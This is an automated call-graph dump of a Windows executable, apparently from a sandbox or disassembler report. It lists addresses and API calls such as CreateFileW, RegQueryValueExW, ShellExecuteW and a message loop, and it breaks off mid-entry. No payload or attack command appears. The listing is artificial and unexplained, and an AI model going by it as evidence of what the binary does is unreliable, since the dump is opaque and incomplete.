105148 a50478 105146->105148 105149 a50c7c CloseHandle 105146->105149 105159 a504a1 LeaveCriticalSection __wsopen_s 105148->105159 105218 a5071a CreateFileW 105149->105218 105151 a50ca7 105152 a50cb1 GetLastError 105151->105152 105153 a50cdd 105151->105153 105219 a3f613 20 API calls 2 library calls 105152->105219 105153->105148 105155 a50cbd 105220 a456a6 21 API calls 3 library calls 105155->105220 105157->105103 105158->105109 105159->105109 105161 a507d0 105160->105161 105167 a507ea 105160->105167 105161->105167 105228 a3f649 20 API calls __dosmaperr 105161->105228 105164 a507df 105229 a42b5c 26 API calls pre_c_initialization 105164->105229 105166 a50822 105168 a50851 105166->105168 105230 a3f649 20 API calls __dosmaperr 105166->105230 105221 a5073f 105167->105221 105176 a508a4 105168->105176 105232 a3da7d 26 API calls 2 library calls 105168->105232 105171 a5089f 105173 a5091e 105171->105173 105171->105176 105172 a50846 105231 a42b5c 26 API calls pre_c_initialization 105172->105231 105233 a42b6c 11 API calls _abort 105173->105233 105176->105113 105176->105114 105177 a5092a 105179 a455a0 ___BuildCatchObject 105178->105179 105236 a432d1 EnterCriticalSection 105179->105236 105181 a455ee 105237 a4569d 105181->105237 105183 a455cc 105186 a45373 __wsopen_s 21 API calls 105183->105186 105184 a455a7 105184->105181 105184->105183 105188 a4563a EnterCriticalSection 105184->105188 105185 a45617 __fread_nolock 105185->105117 105187 a455d1 105186->105187 105187->105181 105240 a454ba EnterCriticalSection 105187->105240 105188->105181 105190 a45647 LeaveCriticalSection 105188->105190 105190->105184 105191->105130 105192->105118 105193->105148 105194->105124 105195->105118 105196->105136 105197->105118 105198->105134 105199->105141 105200->105138 105201->105140 105202->105144 105204 a45737 __wsopen_s 26 API calls 105203->105204 105206 a48a3e 105204->105206 105205 a48a44 105242 a456a6 21 API calls 3 library calls 105205->105242 105206->105205 105207 a48a76 105206->105207 105209 a45737 __wsopen_s 26 API calls 105206->105209 105207->105205 105210 a45737 __wsopen_s 26 API calls 105207->105210 105213 a48a6d 105209->105213 105214 a48a82 CloseHandle 105210->105214 105211 a48a9c 105212 a48abe 105211->105212 105243 a3f613 20 API calls 2 library calls 105211->105243 105212->105148 105216 a45737 __wsopen_s 26 API calls 105213->105216 105214->105205 105217 a48a8e GetLastError 105214->105217 105216->105207 105217->105205 105218->105151 105219->105155 105220->105153 105224 a50757 105221->105224 105222 a50772 105222->105166 105224->105222 105234 a3f649 20 API calls __dosmaperr 105224->105234 105225 a50796 105235 a42b5c 26 API calls pre_c_initialization 105225->105235 105227 a507a1 105227->105166 105228->105164 105229->105167 105230->105172 105231->105168 105232->105171 105233->105177 105234->105225 105235->105227 105236->105184 105241 a43319 LeaveCriticalSection 105237->105241 105239 a456a4 105239->105185 105240->105181 105241->105239 105242->105211 105243->105212 103549 a3076b 103550 a30777 ___BuildCatchObject 103549->103550 103579 a30221 103550->103579 103552 a3077e 103553 a308d1 103552->103553 103556 a307a8 103552->103556 103617 a30baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 103553->103617 103555 a308d8 103618 a351c2 28 API calls _abort 103555->103618 103567 a307e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 103556->103567 103590 a427ed 103556->103590 103558 a308de 103619 a35174 28 API calls _abort 103558->103619 103562 a308e6 103563 a307c7 103565 a30848 103598 a30cc9 103565->103598 103567->103565 103613 a3518a 38 API calls 2 library calls 103567->103613 103568 a3084e 103602 a1331b 103568->103602 103573 a3086a 103573->103555 103574 a3086e 103573->103574 103575 a30877 103574->103575 103615 a35165 28 API calls _abort 103574->103615 103616 a303b0 13 API calls 2 library calls 103575->103616 103578 a3087f 103578->103563 103580 a3022a 103579->103580 103620 a30a08 IsProcessorFeaturePresent 103580->103620 103582 a30236 103621 a33004 10 API calls 3 library calls 103582->103621 103584 a3023b 103589 a3023f 103584->103589 103622 a42687 103584->103622 103586 a30256 103586->103552 103589->103552 103591 a42804 103590->103591 103592 a30dfc _ValidateLocalCookies 5 API calls 103591->103592 103593 a307c1 103592->103593 103593->103563 103594 a42791 103593->103594 103597 a427c0 103594->103597 103595 a30dfc _ValidateLocalCookies 5 API calls 103596 a427e9 103595->103596 103596->103567 103597->103595 103697 a326b0 103598->103697 103601 a30cef 103601->103568 103603 a13327 IsThemeActive 103602->103603 103604 a13382 103602->103604 103699 a352b3 103603->103699 103614 a30d02 GetModuleHandleW 103604->103614 103606 a13352 103705 a35319 103606->103705 103608 a13359 103712 a132e6 SystemParametersInfoW SystemParametersInfoW 103608->103712 103610 a13360 103713 a1338b 103610->103713 103612 a13368 SystemParametersInfoW 103612->103604 103613->103565 103614->103573 103615->103575 103616->103578 103617->103555 103618->103558 103619->103562 103620->103582 103621->103584 103626 a4d576 103622->103626 103625 a3302d 8 API calls 3 library calls 103625->103589 103628 a4d58f 103626->103628 103630 a4d593 103626->103630 103644 a30dfc 103628->103644 103629 a30248 103629->103586 103629->103625 103630->103628 103632 a44f6e 103630->103632 103633 a44f7a ___BuildCatchObject 103632->103633 103651 a432d1 EnterCriticalSection 103633->103651 103635 a44f81 103652 a45422 103635->103652 103637 a44f90 103638 a44f9f 103637->103638 103665 a44e02 29 API calls 103637->103665 103667 a44fbb LeaveCriticalSection _abort 103638->103667 103641 a44f9a 103666 a44eb8 GetStdHandle GetFileType 103641->103666 103642 a44fb0 __fread_nolock 103642->103630 103645 a30e07 IsProcessorFeaturePresent 103644->103645 103646 a30e05 103644->103646 103648 a30fce 103645->103648 103646->103629 103696 a30f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 103648->103696 103650 a310b1 103650->103629 103651->103635 103653 a4542e ___BuildCatchObject 103652->103653 103654 a45452 103653->103654 103655 a4543b 103653->103655 103668 a432d1 EnterCriticalSection 103654->103668 103676 a3f649 20 API calls __dosmaperr 103655->103676 103658 a4545e 103664 a4548a 103658->103664 103669 a45373 103658->103669 103659 a45440 103677 a42b5c 26 API calls pre_c_initialization 103659->103677 103662 a4544a __fread_nolock 103662->103637 103678 a454b1 LeaveCriticalSection _abort 103664->103678 103665->103641 103666->103638 103667->103642 103668->103658 103679 a44ff0 103669->103679 103671 a45385 103675 a45392 103671->103675 103686 a43778 11 API calls 2 library calls 103671->103686 103673 a453e4 103673->103658 103687 a42d38 103675->103687 103676->103659 103677->103662 103678->103662 103684 a44ffd pre_c_initialization 103679->103684 103680 a4503d 103694 a3f649 20 API calls __dosmaperr 103680->103694 103681 a45028 RtlAllocateHeap 103682 a4503b 103681->103682 103681->103684 103682->103671 103684->103680 103684->103681 103693 a3521d 7 API calls 2 library calls 103684->103693 103686->103671 103688 a42d6c _free 103687->103688 103689 a42d43 RtlFreeHeap 103687->103689 103688->103673 103689->103688 103690 a42d58 103689->103690 103695 a3f649 20 API calls __dosmaperr 103690->103695 103692 a42d5e GetLastError 103692->103688 103693->103684 103694->103682 103695->103692 103696->103650 103698 a30cdc GetStartupInfoW 103697->103698 103698->103601 103700 a352bf ___BuildCatchObject 103699->103700 103762 a432d1 EnterCriticalSection 103700->103762 103702 a352ca pre_c_initialization 103763 a3530a 103702->103763 103704 a352ff __fread_nolock 103704->103606 103706 a35325 103705->103706 103707 a3533f 103705->103707 103706->103707 103767 a3f649 20 API calls __dosmaperr 103706->103767 103707->103608 103709 a3532f 103768 a42b5c 26 API calls pre_c_initialization 103709->103768 103711 a3533a 103711->103608 103712->103610 103714 a1339b __wsopen_s 103713->103714 103715 a1bf73 8 API calls 103714->103715 103716 a133a7 GetCurrentDirectoryW 103715->103716 103769 a14fd9 103716->103769 103718 a133ce IsDebuggerPresent 103719 a53ca3 MessageBoxA 103718->103719 103720 a133dc 103718->103720 103722 a53cbb 103719->103722 103721 a133f0 103720->103721 103720->103722 103837 a13a95 103721->103837 103873 a14176 8 API calls 103722->103873 103729 a13462 103731 a53cec SetCurrentDirectoryW 103729->103731 103732 a1346a 103729->103732 103731->103732 103733 a13475 103732->103733 103874 a71fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 103732->103874 103869 a134d3 7 API calls 103733->103869 103736 a53d07 103736->103733 103739 a53d19 103736->103739 103875 a15594 103739->103875 103741 a1347f 103743 a1396b 60 API calls 103741->103743 103744 a13494 103741->103744 103742 a53d22 103745 a1b329 8 API calls 103742->103745 103743->103744 103746 a134af 103744->103746 103748 a13907 Shell_NotifyIconW 103744->103748 103747 a53d30 103745->103747 103751 a134b6 SetCurrentDirectoryW 103746->103751 103749 a53d5f 103747->103749 103750 a53d38 103747->103750 103748->103746 103752 a16b7c 8 API calls 103749->103752 103753 a16b7c 8 API calls 103750->103753 103754 a134ca 103751->103754 103755 a53d5b GetForegroundWindow ShellExecuteW 103752->103755 103756 a53d43 103753->103756 103754->103612 103760 a53d90 103755->103760 103758 a17bb5 8 API calls 103756->103758 103759 a53d51 103758->103759 103761 a16b7c 8 API calls 103759->103761 103760->103746 103761->103755 103762->103702 103766 a43319 LeaveCriticalSection 103763->103766 103765 a35311 103765->103704 103766->103765 103767->103709 103768->103711 103770 a1bf73 8 API calls 103769->103770 103771 a14fef 103770->103771 103882 a163d7 103771->103882 103773 a1500d 103774 a1bd57 8 API calls 103773->103774 103775 a15021 103774->103775 103776 a1bed9 8 API calls 103775->103776 103777 a1502c 103776->103777 103896 a1893c 103777->103896 103780 a1b329 8 API calls 103781 a15045 103780->103781 103782 a1be2d 39 API calls 103781->103782 103783 a15055 103782->103783 103784 a1b329 8 API calls 103783->103784 103785 a1507b 103784->103785 103786 a1be2d 39 API calls 103785->103786 103787 a1508a 103786->103787 103788 a1bf73 8 API calls 103787->103788 103789 a150a8 103788->103789 103899 a151ca 103789->103899 103792 a34d98 _strftime 40 API calls 103793 a150c2 103792->103793 103794 a54b23 103793->103794 103795 a150cc 103793->103795 103797 a151ca 8 API calls 103794->103797 103796 a34d98 _strftime 40 API calls 103795->103796 103799 a150d7 103796->103799 103798 a54b37 103797->103798 103801 a151ca 8 API calls 103798->103801 103799->103798 103800 a150e1 103799->103800 103802 a34d98 _strftime 40 API calls 103800->103802 103803 a54b53 103801->103803 103804 a150ec 103802->103804 103806 a15594 10 API calls 103803->103806 103804->103803 103805 a150f6 103804->103805 103807 a34d98 _strftime 40 API calls 103805->103807 103808 a54b76 103806->103808 103809 a15101 103807->103809 103810 a151ca 8 API calls 103808->103810 103811 a54b9f 103809->103811 103812 a1510b 103809->103812 103815 a54b82 103810->103815 103814 a151ca 8 API calls 103811->103814 103813 a1512e 103812->103813 103816 a1bed9 8 API calls 103812->103816 103818 a54bda 103813->103818 103822 a17e12 8 API calls 103813->103822 103817 a54bbd 103814->103817 103819 a1bed9 8 API calls 103815->103819 103820 a15121 103816->103820 103821 a1bed9 8 API calls 103817->103821 103823 a54b90 103819->103823 103824 a151ca 8 API calls 103820->103824 103825 a54bcb 103821->103825 103826 a1513e 103822->103826 103827 a151ca 8 API calls 103823->103827 103824->103813 103828 a151ca 8 API calls 103825->103828 103829 a18470 8 API calls 103826->103829 103827->103811 103828->103818 103830 a1514c 103829->103830 103905 a18a60 103830->103905 103832 a1893c 8 API calls 103834 a15167 103832->103834 103833 a18a60 8 API calls 103833->103834 103834->103832 103834->103833 103835 a151ab 103834->103835 103836 a151ca 8 API calls 103834->103836 103835->103718 103836->103834 103838 a13aa2 __wsopen_s 103837->103838 103839 a13abb 103838->103839 103841 a540da ___scrt_fastfail 103838->103841 103840 a15851 9 API calls 103839->103840 103842 a13ac4 103840->103842 103843 a540f6 GetOpenFileNameW 103841->103843 103923 a13a57 103842->103923 103845 a54145 103843->103845 103847 a18577 8 API calls 103845->103847 103849 a5415a 103847->103849 103849->103849 103850 a13ad9 103941 a162d5 103850->103941 104558 a13624 7 API calls 103869->104558 103871 a1347a 103872 a135b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 103871->103872 103872->103741 103873->103729 103874->103736 103876 a522d0 __wsopen_s 103875->103876 103877 a155a1 GetModuleFileNameW 103876->103877 103878 a1b329 8 API calls 103877->103878 103879 a155c7 103878->103879 103880 a15851 9 API calls 103879->103880 103881 a155d1 103880->103881 103881->103742 103883 a163e4 __wsopen_s 103882->103883 103884 a18577 8 API calls 103883->103884 103885 a16416 103883->103885 103884->103885 103886 a1655e 8 API calls 103885->103886 103894 a1644c 103885->103894 103886->103885 103887 a1b329 8 API calls 103889 a16543 103887->103889 103888 a1b329 8 API calls 103888->103894 103890 a16a7c 8 API calls 103889->103890 103892 a1654f 103890->103892 103891 a1655e 8 API calls 103891->103894 103892->103773 103894->103888 103894->103891 103895 a1651a 103894->103895 103916 a16a7c 103894->103916 103895->103887 103895->103892 103897 a3014b 8 API calls 103896->103897 103898 a15038 103897->103898 103898->103780 103900 a151f2 103899->103900 103901 a151d4 103899->103901 103903 a18577 8 API calls 103900->103903 103902 a150b4 103901->103902 103904 a1bed9 8 API calls 103901->103904 103902->103792 103903->103902 103904->103902 103906 a18a76 103905->103906 103907 a56737 103906->103907 103914 a18a80 103906->103914 103922 a2b7a2 8 API calls 103907->103922 103908 a56744 103910 a1b4c8 8 API calls 103908->103910 103911 a56762 103910->103911 103911->103911 103912 a18b94 103913 a3014b 8 API calls 103912->103913 103915 a18b9b 103913->103915 103914->103908 103914->103912 103914->103915 103915->103834 103917 a16a8b 103916->103917 103921 a16aac __fread_nolock 103916->103921 103919 a3017b 8 API calls 103917->103919 103918 a3014b 8 API calls 103920 a16abf 103918->103920 103919->103921 103920->103894 103921->103918 103922->103908 103924 a522d0 __wsopen_s 103923->103924 103925 a13a64 GetLongPathNameW 103924->103925 103926 a18577 8 API calls 103925->103926 103927 a13a8c 103926->103927 103928 a153f2 103927->103928 103929 a1bf73 8 API calls 103928->103929 103930 a15404 103929->103930 103931 a15851 9 API calls 103930->103931 103932 a1540f 103931->103932 103933 a1541a 103932->103933 103934 a54d5b 103932->103934 103936 a16a7c 8 API calls 103933->103936 103938 a54d7d 103934->103938 103977 a2e36b 41 API calls 103934->103977 103937 a15426 103936->103937 103971 a11340 103937->103971 103940 a15439 103940->103850 103978 a16679 103941->103978 103944 a55336 104103 a836b8 103944->104103 103945 a16679 93 API calls 103947 a1630e 103945->103947 103947->103944 103949 a16316 103947->103949 103972 a11352 103971->103972 103976 a11371 __fread_nolock 103971->103976 103975 a3017b 8 API calls 103972->103975 103973 a3014b 8 API calls 103974 a11388 103973->103974 103974->103940 103975->103976 103976->103973 103977->103934 104157 a1663e LoadLibraryA 103978->104157 103983 a166a4 LoadLibraryExW 104165 a16607 LoadLibraryA 103983->104165 103984 a55648 103986 a166e7 68 API calls 103984->103986 103988 a5564f 103986->103988 103990 a16607 3 API calls 103988->103990 103992 a55657 103990->103992 103991 a166ce 103991->103992 103993 a166da 103991->103993 104186 a1684a 103992->104186 103994 a166e7 68 API calls 103993->103994 103996 a162fa 103994->103996 103996->103944 103996->103945 104104 a836d4 104103->104104 104158 a16674 104157->104158 104159 a16656 GetProcAddress 104157->104159 104162 a3e95b 104158->104162 104160 a16666 104159->104160 104160->104158 104161 a1666d FreeLibrary 104160->104161 104161->104158 104194 a3e89a 104162->104194 104164 a16698 104164->103983 104164->103984 104166 a1663b 104165->104166 104167 a1661c GetProcAddress 104165->104167 104170 a16720 104166->104170 104168 a1662c 104167->104168 104168->104166 104169 a16634 FreeLibrary 104168->104169 104169->104166 104171 a3017b 8 API calls 104170->104171 104172 a16735 104171->104172 104173 a1423c 8 API calls 104172->104173 104175 a16741 __fread_nolock 104173->104175 104174 a556c2 104252 a83a92 74 API calls 104174->104252 104175->104174 104179 a1677c 104175->104179 104251 a83a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 104175->104251 104178 a1684a 40 API calls 104178->104179 104179->104178 104181 a16810 messages 104179->104181 104182 a16874 64 API calls 104179->104182 104183 a55706 104179->104183 104181->103991 104182->104179 104246 a16874 104183->104246 104187 a1685c 104186->104187 104190 a55760 104186->104190 104284 a3ec34 104187->104284 104191 a832bd 104393 a8310d 104191->104393 104197 a3e8a6 ___BuildCatchObject 104194->104197 104195 a3e8b4 104219 a3f649 20 API calls __dosmaperr 104195->104219 104197->104195 104199 a3e8e4 104197->104199 104198 a3e8b9 104220 a42b5c 26 API calls pre_c_initialization 104198->104220 104201 a3e8f6 104199->104201 104202 a3e8e9 104199->104202 104211 a483e1 104201->104211 104221 a3f649 20 API calls __dosmaperr 104202->104221 104205 a3e8ff 104207 a3e912 104205->104207 104208 a3e905 104205->104208 104206 a3e8c4 __fread_nolock 104206->104164 104223 a3e944 LeaveCriticalSection __fread_nolock 104207->104223 104222 a3f649 20 API calls __dosmaperr 104208->104222 104212 a483ed ___BuildCatchObject 104211->104212 104224 a432d1 EnterCriticalSection 104212->104224 104214 a483fb 104225 a4847b 104214->104225 104218 a4842c __fread_nolock 104218->104205 104219->104198 104220->104206 104221->104206 104222->104206 104223->104206 104224->104214 104233 a4849e 104225->104233 104226 a484f7 104227 a44ff0 pre_c_initialization 20 API calls 104226->104227 104228 a48500 104227->104228 104230 a42d38 _free 20 API calls 104228->104230 104231 a48509 104230->104231 104234 a48408 104231->104234 104243 a43778 11 API calls 2 library calls 104231->104243 104233->104226 104233->104234 104241 a394fd EnterCriticalSection 104233->104241 104242 a39511 LeaveCriticalSection 104233->104242 104238 a48437 104234->104238 104235 a48528 104244 a394fd EnterCriticalSection 104235->104244 104245 a43319 LeaveCriticalSection 104238->104245 104240 a4843e 104240->104218 104241->104233 104242->104233 104243->104235 104244->104234 104245->104240 104247 a16883 104246->104247 104248 a55780 104246->104248 104253 a3f053 104247->104253 104251->104174 104252->104179 104256 a3ee1a 104253->104256 104259 a3ee26 ___BuildCatchObject 104256->104259 104257 a3ee32 104281 a3f649 20 API calls __dosmaperr 104257->104281 104258 a3ee58 104269 a394fd EnterCriticalSection 104258->104269 104259->104257 104259->104258 104287 a3ec51 104284->104287 104286 a1686d 104286->104191 104288 a3ec5d ___BuildCatchObject 104287->104288 104289 a3ec70 ___scrt_fastfail 104288->104289 104290 a3ec9d 104288->104290 104291 a3ec95 __fread_nolock 104288->104291 104314 a3f649 20 API calls __dosmaperr 104289->104314 104300 a394fd EnterCriticalSection 104290->104300 104291->104286 104294 a3eca7 104301 a3ea68 104294->104301 104295 a3ec8a 104315 a42b5c 26 API calls pre_c_initialization 104295->104315 104300->104294 104304 a3ea7a ___scrt_fastfail 104301->104304 104307 a3ea97 104301->104307 104302 a3ea87 104389 a3f649 20 API calls __dosmaperr 104302->104389 104304->104302 104304->104307 104309 a3eada __fread_nolock 104304->104309 104305 a3ea8c 104316 a3ecdc LeaveCriticalSection __fread_nolock 104307->104316 104308 a3ebf6 ___scrt_fastfail 104392 a3f649 20 API calls __dosmaperr 104308->104392 104309->104307 104309->104308 104317 a3dcc5 104309->104317 104324 a490c5 104309->104324 104391 a3d2e8 26 API calls 4 library calls 104309->104391 104314->104295 104315->104291 104316->104291 104389->104305 104391->104309 104392->104305 104396 a3e858 104393->104396 104399 a3e7d9 104396->104399 104400 a3e7e8 104399->104400 104401 a3e7fc 104399->104401 104407 a3f649 20 API calls __dosmaperr 104400->104407 104406 a3e7f8 __alldvrm 104401->104406 104409 a436b2 11 API calls 2 library calls 104401->104409 104409->104406 104558->103871 105244 a6400f 105260 a1eeb0 messages 105244->105260 105245 a1f0d5 105246 a1f211 PeekMessageW 105246->105260 105247 a1ef07 GetInputState 105247->105246 105247->105260 105249 a632cd TranslateAcceleratorW 105249->105260 105250 a1f28f PeekMessageW 105250->105260 105251 a1f104 timeGetTime 105251->105260 105252 a1f273 TranslateMessage DispatchMessageW 105252->105250 105253 a1f2af Sleep 105271 a1f2c0 105253->105271 105254 a64183 Sleep 105254->105271 105255 a633e9 timeGetTime 105311 a2aa65 9 API calls 105255->105311 105256 a2f215 timeGetTime 105256->105271 105257 a7dd87 46 API calls 105257->105271 105259 a6421a GetExitCodeProcess 105263 a64246 CloseHandle 105259->105263 105264 a64230 WaitForSingleObject 105259->105264 105260->105245 105260->105246 105260->105247 105260->105249 105260->105250 105260->105251 105260->105252 105260->105253 105260->105254 105260->105255 105273 a20340 206 API calls 105260->105273 105274 a22b20 206 API calls 105260->105274 105276 a1f450 105260->105276 105283 a1f6d0 105260->105283 105306 a2e915 105260->105306 105312 a8446f 8 API calls 105260->105312 105313 a83fe1 81 API calls __wsopen_s 105260->105313 105261 a63d51 105266 a63d59 105261->105266 105262 aa345b GetForegroundWindow 105262->105271 105263->105271 105264->105260 105264->105263 105267 a642b8 Sleep 105267->105260 105271->105256 105271->105257 105271->105259 105271->105260 105271->105261 105271->105262 105271->105267 105314 a960b5 8 API calls 105271->105314 105315 a7f292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105271->105315 105273->105260 105274->105260 105277 a1f483 105276->105277 105278 a1f46f 105276->105278 105348 a83fe1 81 API calls __wsopen_s 105277->105348 105316 a1e960 105278->105316 105281 a1f47a 105281->105260 105282 a64584 105282->105282 105284 a1f710 105283->105284 105291 a1f7dc messages 105284->105291 105365 a305b2 5 API calls __Init_thread_wait 105284->105365 105286 a83fe1 81 API calls 105286->105291 105288 a645d9 105290 a1bf73 8 API calls 105288->105290 105288->105291 105289 a1bf73 8 API calls 105289->105291 105292 a645f3 105290->105292 105291->105286 105291->105289 105293 a1be2d 39 API calls 105291->105293 105299 a20340 206 API calls 105291->105299 105301 a1bed9 8 API calls 105291->105301 105302 a21ca0 8 API calls 105291->105302 105303 a1fae1 105291->105303 105364 a2b35c 206 API calls 105291->105364 105368 a305b2 5 API calls __Init_thread_wait 105291->105368 105369 a30413 29 API calls __onexit 105291->105369 105370 a30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105291->105370 105371 a95231 101 API calls 105291->105371 105372 a9731e 206 API calls 105291->105372 105366 a30413 29 API calls __onexit 105292->105366 105293->105291 105296 a645fd 105367 a30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 105296->105367 105299->105291 105301->105291 105302->105291 105303->105260 105307 a2e959 105306->105307 105308 a2e928 105306->105308 105307->105260 105308->105307 105309 a2e94c IsDialogMessageW 105308->105309 105310 a6eff6 GetClassLongW 105308->105310 105309->105307 105309->105308 105310->105308 105310->105309 105311->105260 105312->105260 105313->105260 105314->105271 105315->105271 105317 a20340 206 API calls 105316->105317 105319 a1e99d 105317->105319 105318 a1ea0b messages 105318->105281 105319->105318 105320 a1edd5 105319->105320 105322 a1eac3 105319->105322 105328 a1ebb8 105319->105328 105331 a3014b 8 API calls 105319->105331 105334 a631d3 105319->105334 105343 a1eb29 __fread_nolock messages 105319->105343 105320->105318 105332 a3017b 8 API calls 105320->105332 105322->105320 105323 a1eace 105322->105323 105325 a3014b 8 API calls 105323->105325 105324 a1ecff 105326 a631c4 105324->105326 105327 a1ed14 105324->105327 105337 a1ead5 __fread_nolock 105325->105337 105361 a96162 8 API calls 105326->105361 105330 a3014b 8 API calls 105327->105330 105333 a3017b 8 API calls 105328->105333 105340 a1eb6a 105330->105340 105331->105319 105332->105337 105333->105343 105362 a83fe1 81 API calls __wsopen_s 105334->105362 105335 a3014b 8 API calls 105336 a1eaf6 105335->105336 105336->105343 105349 a1d260 105336->105349 105337->105335 105337->105336 105339 a631b3 105360 a83fe1 81 API calls __wsopen_s 105339->105360 105340->105281 105343->105324 105343->105339 105343->105340 105344 a6318e 105343->105344 105346 a6316c 105343->105346 105357 a144fe 206 API calls 105343->105357 105359 a83fe1 81 API calls __wsopen_s 105344->105359 105358 a83fe1 81 API calls __wsopen_s 105346->105358 105348->105282 105350 a1d29a 105349->105350 105351 a1d2c6 105349->105351 105352 a1f6d0 206 API calls 105350->105352 105355 a1d2a0 105350->105355 105353 a20340 206 API calls 105351->105353 105352->105355 105354 a6184b 105353->105354 105354->105355 105363 a83fe1 81 API calls __wsopen_s 105354->105363 105355->105343 105355->105355 105357->105343 105358->105340 105359->105340 105360->105340 105361->105334 105362->105318 105363->105355 105364->105291 105365->105288 105366->105296 105367->105291 105368->105291 105369->105291 105370->105291 105371->105291 105372->105291 105373 a1da4a 105374 a1da54 105373->105374 105384 a1dbc4 105373->105384 105375 a1cf80 39 API calls 105374->105375 105374->105384 105376 a1dace 105375->105376 105377 a3014b 8 API calls 105376->105377 105378 a1dae7 105377->105378 105379 a3017b 8 API calls 105378->105379 105380 a1db05 105379->105380 105381 a3014b 8 API calls 105380->105381 105382 a1db16 __fread_nolock 105381->105382 105383 a3014b 8 API calls 105382->105383 105382->105384 105386 a1db7f 105383->105386 105385 a3017b 8 API calls 105384->105385 105387 a1d5e1 105384->105387 105390 a1dc19 105384->105390 105385->105384 105386->105384 105388 a1cf80 39 API calls 105386->105388 105389 a3014b 8 API calls 105387->105389 105388->105384 105395 a1d66e messages 105389->105395 105391 a1c3ab 8 API calls 105401 a1d9ac messages 105391->105401 105392 a1b4c8 8 API calls 105392->105395 105394 a61f79 105404 a756ae 8 API calls messages 105394->105404 105395->105392 105395->105394 105397 a61f94 105395->105397 105398 a1bed9 8 API calls 105395->105398 105399 a1c3ab 8 API calls 105395->105399 105400 a1d911 messages 105395->105400 105398->105395 105399->105395 105400->105391 105400->105401 105402 a1d9c3 105401->105402 105403 a2e30a 8 API calls messages 105401->105403 105403->105401 105404->105397 104559 a3f06e 104560 a3f07a ___BuildCatchObject 104559->104560 104561 a3f086 104560->104561 104562 a3f09b 104560->104562 104578 a3f649 20 API calls __dosmaperr 104561->104578 104572 a394fd EnterCriticalSection 104562->104572 104565 a3f08b 104579 a42b5c 26 API calls pre_c_initialization 104565->104579 104566 a3f0a7 104573 a3f0db 104566->104573 104570 a3f096 __fread_nolock 104572->104566 104581 a3f106 104573->104581 104575 a3f0e8 104577 a3f0b4 104575->104577 104601 a3f649 20 API calls __dosmaperr 104575->104601 104580 a3f0d1 LeaveCriticalSection __fread_nolock 104577->104580 104578->104565 104579->104570 104580->104570 104582 a3f114 104581->104582 104583 a3f12e 104581->104583 104605 a3f649 20 API calls __dosmaperr 104582->104605 104585 a3dcc5 __fread_nolock 26 API calls 104583->104585 104586 a3f137 104585->104586 104602 a49789 104586->104602 104587 a3f119 104606 a42b5c 26 API calls pre_c_initialization 104587->104606 104591 a3f23b 104593 a3f248 104591->104593 104596 a3f1ee 104591->104596 104592 a3f1bf 104595 a3f1dc 104592->104595 104592->104596 104608 a3f649 20 API calls __dosmaperr 104593->104608 104607 a3f41f 31 API calls 4 library calls 104595->104607 104598 a3f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 104596->104598 104609 a3f29b 30 API calls 2 library calls 104596->104609 104598->104575 104599 a3f1e6 104599->104598 104601->104577 104610 a49606 104602->104610 104604 a3f153 104604->104591 104604->104592 104604->104598 104605->104587 104606->104598 104607->104599 104608->104598 104609->104598 104611 a49612 ___BuildCatchObject 104610->104611 104612 a49632 104611->104612 104613 a4961a 104611->104613 104614 a496e6 104612->104614 104620 a4966a 104612->104620 104645 a3f636 20 API calls __dosmaperr 104613->104645 104650 a3f636 20 API calls __dosmaperr 104614->104650 104616 a4961f 104646 a3f649 20 API calls __dosmaperr 104616->104646 104619 a496eb 104651 a3f649 20 API calls __dosmaperr 104619->104651 104635 a454ba EnterCriticalSection 104620->104635 104621 a49627 __fread_nolock 104621->104604 104624 a496f3 104652 a42b5c 26 API calls pre_c_initialization 104624->104652 104625 a49670 104627 a49694 104625->104627 104628 a496a9 104625->104628 104647 a3f649 20 API calls __dosmaperr 104627->104647 104636 a4970b 104628->104636 104631 a496a4 104649 a496de LeaveCriticalSection __wsopen_s 104631->104649 104632 a49699 104648 a3f636 20 API calls __dosmaperr 104632->104648 104635->104625 104653 a45737 104636->104653 104638 a4971d 104639 a49725 104638->104639 104640 a49736 SetFilePointerEx 104638->104640 104666 a3f649 20 API calls __dosmaperr 104639->104666 104641 a4972a 104640->104641 104642 a4974e GetLastError 104640->104642 104641->104631 104667 a3f613 20 API calls 2 library calls 104642->104667 104645->104616 104646->104621 104647->104632 104648->104631 104649->104621 104650->104619 104651->104624 104652->104621 104654 a45744 104653->104654 104657 a45759 104653->104657 104668 a3f636 20 API calls __dosmaperr 104654->104668 104656 a45749 104669 a3f649 20 API calls __dosmaperr 104656->104669 104660 a4577e 104657->104660 104670 a3f636 20 API calls __dosmaperr 104657->104670 104660->104638 104661 a45789 104671 a3f649 20 API calls __dosmaperr 104661->104671 104662 a45751 104662->104638 104664 a45791 104672 a42b5c 26 API calls pre_c_initialization 104664->104672 104666->104641 104667->104641 104668->104656 104669->104662 104670->104661 104671->104664 104672->104662 104673 a11033 104678 a168b4 104673->104678 104677 a11042 104679 a1bf73 8 API calls 104678->104679 104680 a16922 104679->104680 104686 a1589f 104680->104686 104682 a169bf 104684 a11038 104682->104684 104689 a16b14 8 API calls __fread_nolock 104682->104689 104685 a30413 29 API calls __onexit 104684->104685 104685->104677 104690 a158cb 104686->104690 104689->104682 104691 a158be 104690->104691 104692 a158d8 104690->104692 104691->104682 104692->104691 104693 a158df RegOpenKeyExW 104692->104693 104693->104691 104694 a158f9 RegQueryValueExW 104693->104694 104695 a1592f RegCloseKey 104694->104695 104696 a1591a 104694->104696 104695->104691 104696->104695 105405 a66555 105406 a3014b 8 API calls 105405->105406 105407 a6655c 105406->105407 105409 a3017b 8 API calls 105407->105409 105411 a66575 __fread_nolock 105407->105411 105408 a3017b 8 API calls 105410 a6659a 105408->105410 105409->105411 105411->105408 104697 a136f5 104700 a1370f 104697->104700 104701 a13726 104700->104701 104702 a1372b 104701->104702 104703 a1378a 104701->104703 104739 a13788 104701->104739 104707 a13804 PostQuitMessage 104702->104707 104708 a13738 104702->104708 104705 a53df4 104703->104705 104706 a13790 104703->104706 104704 a1376f DefWindowProcW 104730 a13709 104704->104730 104755 